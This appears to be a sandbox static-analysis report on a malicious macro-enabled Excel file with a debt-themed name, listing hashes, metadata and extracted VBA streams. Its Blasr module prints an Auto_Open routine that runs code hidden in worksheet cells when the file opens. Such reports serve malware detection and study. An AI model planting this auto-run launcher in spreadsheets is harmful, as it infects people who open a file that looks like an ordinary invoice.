                                                                                                                                                • ZIP compressed archive (8000/1) 7.58%
                                                                                                                                                File name:Outstanding-Debt-1840996632-05042021.xlsm
                                                                                                                                                File size:116888
                                                                                                                                                MD5:0276be45120eeb640587451db55759cb
                                                                                                                                                SHA1:51424cff72ecb039f78d5005a03ec2882a96d7dd
                                                                                                                                                SHA256:06c9a8f5da75ebc77f7528ceb2797050ba17cc2c7e36467b0d259d4f48dbbcbf
                                                                                                                                                SHA512:588441fa0cc28dc18ff0ebc51f40ecba27012125ccedff3866b75d717e8360c19149ed75f0bf83027088e1789b4228a0f5810c94c60c06ff0d4bbb6bb1da4a2c
                                                                                                                                                SSDEEP:3072:zvKINbjvw548LMb/oqKO8NnS8+60KcplBO:+AbT648LM7D98Np+EeK
                                                                                                                                                File Content Preview:PK..........!."..R....*.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                                                                                                                File Icon

                                                                                                                                                Icon Hash:74ecd0e2f696908c

                                                                                                                                                Static OLE Info

                                                                                                                                                General

                                                                                                                                                Document Type:OpenXML
                                                                                                                                                Number of OLE Files:1

                                                                                                                                                OLE File "/opt/package/joesandbox/database/analysis/404162/sample/Outstanding-Debt-1840996632-05042021.xlsm"

                                                                                                                                                Indicators

                                                                                                                                                Has Summary Info:False
                                                                                                                                                Application Name:unknown
                                                                                                                                                Encrypted Document:False
                                                                                                                                                Contains Word Document Stream:
                                                                                                                                                Contains Workbook/Book Stream:
                                                                                                                                                Contains PowerPoint Document Stream:
                                                                                                                                                Contains Visio Document Stream:
                                                                                                                                                Contains ObjectPool Stream:
                                                                                                                                                Flash Objects Count:
                                                                                                                                                Contains VBA Macros:True

                                                                                                                                                Summary

                                                                                                                                                Author:Rabota
                                                                                                                                                Last Saved By:Noped
                                                                                                                                                Create Time:2015-06-05T18:19:34Z
                                                                                                                                                Last Saved Time:2021-05-04T08:05:25Z
                                                                                                                                                Creating Application:Microsoft Excel
                                                                                                                                                Security:0

                                                                                                                                                Document Summary

                                                                                                                                                Thumbnail Scaling Desired:false
                                                                                                                                                Company:
                                                                                                                                                Contains Dirty Links:false
                                                                                                                                                Shared Document:false
                                                                                                                                                Changed Hyperlinks:false
                                                                                                                                                Application Version:16.0300

                                                                                                                                                Streams with VBA

                                                                                                                                                VBA File Name: Blasr.bas, Stream Size: 1166
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Blasr
                                                                                                                                                VBA File Name:Blasr.bas
                                                                                                                                                Stream Size:1166
                                                                                                                                                Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ^ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 fd 03 00 00 00 00 00 00 01 00 00 00 1c cc 5e 9c 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                "Blasr"
                                                                                                                                                Application.Run
                                                                                                                                                Attribute
                                                                                                                                                Auto_Open()
                                                                                                                                                VB_Name
                                                                                                                                                Private
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Blasr"
                                                                                                                                                Private Sub Auto_Open()
                                                                                                                                                Application.Run Sheets("Nyukasl").Range("AJ6")
                                                                                                                                                
                                                                                                                                                Application.Run Sheets("Nyukasl").Range("A5")
                                                                                                                                                Application.Run Sheets("Nyukasl").Range("A5")
                                                                                                                                                
                                                                                                                                                
                                                                                                                                                
                                                                                                                                                
                                                                                                                                                
                                                                                                                                                
                                                                                                                                                End Sub
                                                                                                                                                VBA File Name: Briks.cls, Stream Size: 990
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Briks
                                                                                                                                                VBA File Name:Briks.cls
                                                                                                                                                Stream Size:990
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 1e a1 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                "Briks"
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Briks"
                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = True
                                                                                                                                                VBA File Name: Byutut.bas, Stream Size: 1056
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Byutut
                                                                                                                                                VBA File Name:Byutut.bas
                                                                                                                                                Stream Size:1056
                                                                                                                                                Data ASCII:. . . . . . . . . R . . . . . . . . . . . . . . . Y . . . . . . . . . . . . . . . . . ; G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 52 03 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 59 03 00 00 f5 03 00 00 00 00 00 00 01 00 00 00 1c cc 3b 47 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                "Byutut"
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Byutut"
                                                                                                                                                VBA File Name: Class1.cls, Stream Size: 1151
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class1
                                                                                                                                                VBA File Name:Class1.cls
                                                                                                                                                Stream Size:1151
                                                                                                                                                Data ASCII:. . . . . . . . . Z . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 5a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff 61 03 00 00 c5 03 00 00 00 00 00 00 01 00 00 00 1c cc a3 ac 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Class1"
                                                                                                                                                Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = False
                                                                                                                                                Attribute VB_Exposed = False
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = False
                                                                                                                                                VBA File Name: Class2.cls, Stream Size: 999
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class2
                                                                                                                                                VBA File Name:Class2.cls
                                                                                                                                                Stream Size:999
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . ~ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc 7e e9 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Class2"
                                                                                                                                                Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = False
                                                                                                                                                Attribute VB_Exposed = False
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = False
                                                                                                                                                VBA File Name: Class3.cls, Stream Size: 999
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Class3
                                                                                                                                                VBA File Name:Class3.cls
                                                                                                                                                Stream Size:999
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc c8 17 00 00 ff ff 01 00 00 00 80 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Class3"
                                                                                                                                                Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = False
                                                                                                                                                Attribute VB_Exposed = False
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = False
                                                                                                                                                VBA File Name: Kikide.cls, Stream Size: 1249
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Kikide
                                                                                                                                                VBA File Name:Kikide.cls
                                                                                                                                                Stream Size:1249
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ) . . . . . . . . . . . . . R . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 9a 03 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff a1 03 00 00 29 04 00 00 00 00 00 00 01 00 00 00 1c cc 52 09 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                "Kikide"
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Kikide"
                                                                                                                                                Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = True
                                                                                                                                                VBA File Name: UserForm1.frm, Stream Size: 1526
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/UserForm1
                                                                                                                                                VBA File Name:UserForm1.frm
                                                                                                                                                Stream Size:1526
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . { \\ . . B . H N . . . . . I . . . . . O < . * N . 7 { / a . . . 0 $ . . . v . K . . . . 1 . . . . . . . . . h : . . L N . . V = . 5 . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 00 01 00 00 9e 04 00 00 e4 00 00 00 84 02 00 00 ff ff ff ff a5 04 00 00 09 05 00 00 00 00 00 00 01 00 00 00 1c cc 2b 09 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 7b 5c fd e6 42 8a 48 4e aa cd df d6 fd 49 99 1c 83 98 07 4f 3c d6 2a 4e ad 37 7b 2f 61 a2 ba cd 30 24 1b a6 ea 76 1d 4b a3 81 e7 c2 31

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "UserForm1"
                                                                                                                                                Attribute VB_Base = "0{4F079883-D63C-4E2A-AD37-7B2F61A2BACD}{A61B2430-76EA-4B1D-A381-E7C23109F48A}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                Attribute VB_Exposed = False
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = False
                                                                                                                                                VBA File Name: Vrest.bas, Stream Size: 679
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Vrest
                                                                                                                                                VBA File Name:Vrest.bas
                                                                                                                                                Stream Size:679
                                                                                                                                                Data ASCII:. . . . . . . . . " . . . . . . . . . . . . . . . ) . . . } . . . . . . . . . . . . . ' . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 22 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 29 02 00 00 7d 02 00 00 00 00 00 00 01 00 00 00 1c cc 27 ea 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                Attribute
                                                                                                                                                "Vrest"
                                                                                                                                                VB_Name
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Vrest"
                                                                                                                                                VBA File Name: Vsewd.cls, Stream Size: 990
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/Vsewd
                                                                                                                                                VBA File Name:Vsewd.cls
                                                                                                                                                Stream Size:990
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 1c cc b2 ae 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                                                                                                                                VBA Code Keywords

                                                                                                                                                Keyword
                                                                                                                                                False
                                                                                                                                                VB_Exposed
                                                                                                                                                Attribute
                                                                                                                                                VB_Name
                                                                                                                                                VB_Creatable
                                                                                                                                                "Vsewd"
                                                                                                                                                VB_PredeclaredId
                                                                                                                                                VB_GlobalNameSpace
                                                                                                                                                VB_Base
                                                                                                                                                VB_Customizable
                                                                                                                                                VB_TemplateDerived
                                                                                                                                                VBA Code
                                                                                                                                                Attribute VB_Name = "Vsewd"
                                                                                                                                                Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                                                                                                Attribute VB_GlobalNameSpace = False
                                                                                                                                                Attribute VB_Creatable = False
                                                                                                                                                Attribute VB_PredeclaredId = True
                                                                                                                                                Attribute VB_Exposed = True
                                                                                                                                                Attribute VB_TemplateDerived = False
                                                                                                                                                Attribute VB_Customizable = True

                                                                                                                                                Streams

                                                                                                                                                Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 856
                                                                                                                                                General
                                                                                                                                                Stream Path:PROJECT
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:856
                                                                                                                                                Entropy:5.31019504221
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:I D = " { 4 4 8 1 7 C A 7 - 1 5 D A - 4 D 2 5 - B 4 C E - 4 7 0 F 9 E A 0 E 5 D F } " . . D o c u m e n t = K i k i d e / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = B r i k s / & H 0 0 0 0 0 0 0 0 . . M o d u l e = B y u t u t . . D o c u m e n t = V s e w d / & H 0 0 0 0 0 0 0 0 . . C l a s s = C l a s s 1 . . C l a s s = C l a s s 2 . . C l a s s = C l a s s 3 . . M o d u l e = B l a s r . . M o d u l e = V r e s t . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4
                                                                                                                                                Data Raw:49 44 3d 22 7b 34 34 38 31 37 43 41 37 2d 31 35 44 41 2d 34 44 32 35 2d 42 34 43 45 2d 34 37 30 46 39 45 41 30 45 35 44 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 4b 69 6b 69 64 65 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 42 72 69 6b 73 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 42 79 75 74 75 74 0d 0a 44 6f 63 75 6d 65 6e 74 3d 56 73 65 77
                                                                                                                                                Stream Path: PROJECTwm, File Type: data, Stream Size: 209
                                                                                                                                                General
                                                                                                                                                Stream Path:PROJECTwm
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:209
                                                                                                                                                Entropy:3.32661660177
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:K i k i d e . K . i . k . i . d . e . . . B r i k s . B . r . i . k . s . . . B y u t u t . B . y . u . t . u . t . . . V s e w d . V . s . e . w . d . . . C l a s s 1 . C . l . a . s . s . 1 . . . C l a s s 2 . C . l . a . s . s . 2 . . . C l a s s 3 . C . l . a . s . s . 3 . . . B l a s r . B . l . a . s . r . . . V r e s t . V . r . e . s . t . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . . .
                                                                                                                                                Data Raw:4b 69 6b 69 64 65 00 4b 00 69 00 6b 00 69 00 64 00 65 00 00 00 42 72 69 6b 73 00 42 00 72 00 69 00 6b 00 73 00 00 00 42 79 75 74 75 74 00 42 00 79 00 75 00 74 00 75 00 74 00 00 00 56 73 65 77 64 00 56 00 73 00 65 00 77 00 64 00 00 00 43 6c 61 73 73 31 00 43 00 6c 00 61 00 73 00 73 00 31 00 00 00 43 6c 61 73 73 32 00 43 00 6c 00 61 00 73 00 73 00 32 00 00 00 43 6c 61 73 73 33 00 43
                                                                                                                                                Stream Path: UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/\x1CompObj
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:97
                                                                                                                                                Entropy:3.61064918306
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                                                                                                                                Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Stream Path: UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/\x3VBFrame
                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                Stream Size:266
                                                                                                                                                Entropy:4.62034133633
                                                                                                                                                Base64 Encoded:True
                                                                                                                                                Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                                                                                                                                Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                                                                                                                                Stream Path: UserForm1/f, File Type: data, Stream Size: 38
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/f
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:38
                                                                                                                                                Entropy:1.54052096453
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                                Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                Stream Path: UserForm1/o, File Type: empty, Stream Size: 0
                                                                                                                                                General
                                                                                                                                                Stream Path:UserForm1/o
                                                                                                                                                File Type:empty
                                                                                                                                                Stream Size:0
                                                                                                                                                Entropy:0.0
                                                                                                                                                Base64 Encoded:False
                                                                                                                                                Data ASCII:
                                                                                                                                                Data Raw:
                                                                                                                                                Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 4263
                                                                                                                                                General
                                                                                                                                                Stream Path:VBA/_VBA_PROJECT
                                                                                                                                                File Type:data
                                                                                                                                                Stream Size:4263
                                                                                                                                                Entropy:4.38205341073
                                                                                                                                                Base64 Encoded:False
